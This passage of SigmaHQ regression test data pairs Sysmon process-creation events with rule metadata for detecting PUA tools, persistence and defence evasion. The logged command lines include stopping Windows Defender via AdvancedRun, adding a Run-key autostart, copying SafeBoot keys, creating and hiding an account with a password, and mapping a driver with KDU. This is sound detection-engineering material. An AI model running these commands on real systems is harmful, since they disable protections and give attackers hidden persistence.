"\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml ================================================ id: 5a7dd11d-3b65-49b3-ac81-a9f855742bbc description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 9a132afa-654e-11eb-ae93-0242ac130002 title: PUA - AdFind Suspicious Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: 
regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-23T10:01:48.031627Z" } }, "EventRecordID": 650317, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3076, "ThreadID": 4936 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-23 10:01:48.012", "ProcessGuid": "14207D89-FD0C-68F9-D610-000000003F02", "ProcessId": 2064, "Image": "C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe", "FileVersion": "2.5.4594.1", "Description": "Advanced IP Scanner", "Product": "Advanced IP Scanner", "Company": "Famatech Corp.", "OriginalFileName": "advanced_ip_scanner.exe", "CommandLine": "\"C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe\"", "CurrentDirectory": "C:\\Program Files (x86)\\Advanced IP Scanner\\", "User": "MIDGARDNET\\SwachchhandaP", "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", "LogonId": "0x46940f", "TerminalSessionId": 2, "IntegrityLevel": "Medium", "Hashes": "MD5=B3411927CC7CD05E02BA64B2A789BBDE,SHA256=4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5,IMPHASH=B7378C9136E7511821BFD495ADBE3CB0", "ParentProcessGuid": "14207D89-FCFD-68F9-D010-000000003F02", 
"ParentProcessId": 3240, "ParentImage": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-F5HMR.tmp\\Advanced_IP_Scanner_2.5.4594.1.tmp", "ParentCommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-F5HMR.tmp\\Advanced_IP_Scanner_2.5.4594.1.tmp\" /SL5=\"$E0218,20439558,139776,C:\\Users\\SwachchhandaP\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe\"", "ParentUser": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml ================================================ id: 6629d68a-c1b8-4eb8-bfa6-7dbd5018d922 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f title: PUA - Advanced IP Scanner Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-23T10:11:05.435406Z" } }, "EventRecordID": 650602, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3076, "ThreadID": 4936 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { 
"RuleName": "-", "UtcTime": "2025-10-23 10:11:05.414", "ProcessGuid": "14207D89-FF39-68F9-1A11-000000003F02", "ProcessId": 7316, "Image": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe", "FileVersion": "-", "Description": "Advanced Port Scanner", "Product": "Advanced Port Scanner", "Company": "Famatech Corp.", "OriginalFileName": "advanced_port_scanner.exe", "CommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe\" /portable \"C:/Users/SwachchhandaP/Downloads/\" /lng en_us", "CurrentDirectory": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\", "User": "MIDGARDNET\\SwachchhandaP", "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", "LogonId": "0x46940f", "TerminalSessionId": 2, "IntegrityLevel": "Medium", "Hashes": "MD5=4FDABE571B66CEEC3448939BFB3FFCD1,SHA256=8B9C7D2554FE315199FAE656448DC193ACCBEC162D4AFFF3F204CE2346507A8A,IMPHASH=31E3E9D3DDE3C0C0F2C167B89B8E269C", "ParentProcessGuid": "14207D89-FF2E-68F9-1911-000000003F02", "ParentProcessId": 3972, "ParentImage": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-90PLO.tmp\\Advanced_Port_Scanner_2.5.3869.tmp", "ParentCommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-90PLO.tmp\\Advanced_Port_Scanner_2.5.3869.tmp\" /SL5=\"$E0634,19769177,139776,C:\\Users\\SwachchhandaP\\Downloads\\Advanced_Port_Scanner_2.5.3869.exe\"", "ParentUser": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml ================================================ id: 998b5845-1623-4b2f-b9d1-bfc402172d45 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 54773c5f-f1cc-4703-9126-2f797d96a69d title: PUA - Advanced Port Scanner Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon 
match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-23T10:24:32.948699Z" } }, "EventRecordID": 650887, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3076, "ThreadID": 4936 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-23 10:24:32.936", "ProcessGuid": "14207D89-0260-68FA-9511-000000003F02", "ProcessId": 4220, "Image": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe", "FileVersion": "1.51", "Description": "Run a program with different settings that you choose.", "Product": "AdvancedRun", "Company": "NirSoft", "OriginalFileName": "AdvancedRun.exe", "CommandLine": "\"C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe\"", "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\", "User": "MIDGARDNET\\SwachchhandaP", "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", "LogonId": "0x46940f", "TerminalSessionId": 2, "IntegrityLevel": "Medium", "Hashes": "MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096", "ParentProcessGuid": 
"14207D89-91E9-68F9-E104-000000003F02", "ParentProcessId": 452, "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "C:\\Windows\\Explorer.EXE", "ParentUser": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml ================================================ id: 5f4db274-e3e6-45cd-a5a3-ef03f678dd28 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: d2b749ee-4225-417e-b20e-a8d2193cbb84 title: PUA - AdvancedRun Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-23T10:19:13.088214Z" } }, "EventRecordID": 650834, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3076, "ThreadID": 4936 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-23 10:19:13.085", "ProcessGuid": "14207D89-0121-68FA-6E11-000000003F02", "ProcessId": 6448, "Image": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe", "FileVersion": "1.51", 
"Description": "Run a program with different settings that you choose.", "Product": "AdvancedRun", "Company": "NirSoft", "OriginalFileName": "AdvancedRun.exe", "CommandLine": "AdvancedRun.exe /EXEFilename \"C:\\Windows\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run", "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\", "User": "MIDGARDNET\\SwachchhandaP", "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", "LogonId": "0x46940f", "TerminalSessionId": 2, "IntegrityLevel": "Medium", "Hashes": "MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096", "ParentProcessGuid": "14207D89-00ED-68FA-6611-000000003F02", "ParentProcessId": 700, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml ================================================ id: 0f52b7ec-72e4-4362-acf5-b5558ff58323 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: fa00b701-44c6-4679-994d-5a18afa8a707 title: PUA - AdvancedRun Suspicious Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/e76ca062-4de0-4d79-8d90-160a0d335eca.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": 
{ "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2026-01-23T04:01:30.178887Z" } }, "EventRecordID": 23388, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2026-01-23 04:01:30.177", "ProcessGuid": "0197231E-F29A-6972-6716-000000000800", "ProcessId": 12200, "Image": "C:\\Users\\xodih\\Downloads\\kdu.exe", "FileVersion": "1.1.1.2105", "Description": "Kernel Driver Utility", "Product": "KDU", "Company": "UG North", "OriginalFileName": "Hamakaze.exe", "CommandLine": "\"C:\\Users\\xodih\\Downloads\\kdu.exe\" -prv 1 -map MyDriver.sys", "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=8ED32ACE2FBCE50296D3A1A16D963BA7,SHA256=5A08ECB2FAD5D5C701B4EC42BD0FAB7B7B4616673B2D8FBD76557203C5340A0F,IMPHASH=404E2902C47CF33EE0616252BFBCF67B", "ParentProcessGuid": "0197231E-F25A-6972-5F16-000000000800", "ParentProcessId": 13764, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/info.yml ================================================ id: 199a332f-7017-4afa-81a4-407fb5cc345d description: N/A date: 2026-01-23 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: e76ca062-4de0-4d79-8d90-160a0d335eca title: PUA - Kernel Driver Utility (KDU) Execution 
regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/e76ca062-4de0-4d79-8d90-160a0d335eca.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-22T20:35:26.043284Z" } }, "EventRecordID": 256890, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3168, "ThreadID": 4580 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-1", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-22 20:35:26.041", "ProcessGuid": "5AB40FD1-400E-68F9-6331-000000003B02", "ProcessId": 6032, "Image": "C:\\Windows\\System32\\reg.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Registry Console Tool", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "reg.exe", "CommandLine": "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"softoz\" /t REG_SZ /F /D \"C:\\Users\\admin\\AppData\\Roaming\\sihostt.exe\"", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", "User": "AR-WIN-1\\Administrator", "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", "LogonId": "0x104be4", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": 
"MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", "ParentProcessId": 8252, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "AR-WIN-1\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml ================================================ id: e60e5322-dc51-4969-be3b-12caad8a9276 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: de587dce-915e-4218-aac4-835ca6af6f70 title: Potential Persistence Attempt Via Run Keys Using Reg.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-22T20:38:06.571958Z" } }, "EventRecordID": 256915, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3168, "ThreadID": 4580 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-1", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-22 
20:38:06.570", "ProcessGuid": "5AB40FD1-40AE-68F9-7631-000000003B02", "ProcessId": 2456, "Image": "C:\\Windows\\System32\\reg.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Registry Console Tool", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "reg.exe", "CommandLine": "reg copy hklm\\system\\CurrentControlSet\\services\\acpi hklm\\system\\CurrentControlSet\\control\\safeboot\\network\\nas /s /f", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", "User": "AR-WIN-1\\Administrator", "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", "LogonId": "0x104be4", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", "ParentProcessId": 8252, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "AR-WIN-1\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml ================================================ id: 6f781d8b-1b6c-408b-a90d-08aceb2a14d0 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: d7662ff6-9e97-4596-a61d-9839e32dee8d title: Add SafeBoot Keys Via Reg Utility regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/c43a5405-e8e1-4221-9ac9-dbe3fa14e886.json 
================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2026-01-19T16:11:39.281042Z" } }, "EventRecordID": 553, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 5928, "ThreadID": 9720 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "DESKTOP-54JCEU5", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2026-01-19 16:11:39.278", "ProcessGuid": "34E9093F-57BB-696E-7001-000000000300", "ProcessId": 4392, "Image": "C:\\Windows\\System32\\reg.exe", "FileVersion": "10.0.19041.1 (WinBuild.160101.0800)", "Description": "Registry Console Tool", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "reg.exe", "CommandLine": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language", "CurrentDirectory": "C:\\Users\\marco\\", "User": "DESKTOP-54JCEU5\\marco", "LogonGuid": "34E9093F-54FA-696E-7C2B-070000000000", "LogonId": "0x72b7c", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=227F63E1D9008B36BDBCC4B397780BE4,SHA256=C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC", "ParentProcessGuid": "34E9093F-57AD-696E-6E01-000000000300", "ParentProcessId": 12188, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "DESKTOP-54JCEU5\\marco" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/info.yml 
================================================ id: 70cc76fe-3470-48ad-b15f-5714ad17a5c6 description: N/A date: 2026-01-19 author: Marco Pedrinazzi (@pedrinazziM) (InTheCyber) rule_metadata: - id: c43a5405-e8e1-4221-9ac9-dbe3fa14e886 title: System Language Discovery via Reg.Exe regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/c43a5405-e8e1-4221-9ac9-dbe3fa14e886.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-31T05:06:45.367278Z" } }, "EventRecordID": 657153, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3080, "ThreadID": 4948 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-31 05:06:45.364", "ProcessGuid": "14207D89-43E5-6904-4506-000000004002", "ProcessId": 5244, "Image": "C:\\Windows\\System32\\reg.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Registry Console Tool", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "reg.exe", "CommandLine": "REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ 
/t REG_DWORD /d 0", "CurrentDirectory": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\", "User": "MIDGARDNET\\SwachchhandaP", "LogonGuid": "14207D89-34DD-6904-8287-190000000000", "LogonId": "0x198782", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", "ParentProcessGuid": "14207D89-43E5-6904-4106-000000004002", "ParentProcessId": 6656, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"cmd.exe\" /c NET USER AtomicOperator$ At0micRedTeam! /ADD /expires:never & REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ /t REG_DWORD /d 0", "ParentUser": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml ================================================ id: de8dc72e-19eb-465a-83ac-59545ae56426 description: N/A date: 2025-10-31 author: SigmaHQ Team rule_metadata: - id: 9ec9fb1b-e059-4489-9642-f270c207923d title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, 
"EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-22T20:26:58.441823Z" } }, "EventRecordID": 256793, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3168, "ThreadID": 4580 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-1", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-22 20:26:58.421", "ProcessGuid": "5AB40FD1-3E12-68F9-1A31-000000003B02", "ProcessId": 6856, "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-AdFind.exe", "FileVersion": "1.52.0.5064", "Description": "-", "Product": "AdFind", "Company": "www.joeware.net", "OriginalFileName": "AdFind.exe", "CommandLine": "renamed-AdFind.exe", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", "User": "AR-WIN-1\\Administrator", "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", "LogonId": "0x104be4", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "MD5=12011C44955FD6631113F68A99447515,SHA256=C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3,IMPHASH=12CE1C0F3F5837ECC18A3782408FA975", "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", "ParentProcessId": 8252, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "AR-WIN-1\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/info.yml ================================================ id: 09eb713e-f4b1-42ce-9c8e-d446ba0d548a description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: df55196f-f105-44d3-a675-e9dfb6cc2f2b title: Renamed AdFind Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: 
regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-22T20:29:25.275782Z" } }, "EventRecordID": 256823, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3168, "ThreadID": 4580 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-1", "Security": { "#attributes": { "UserID": 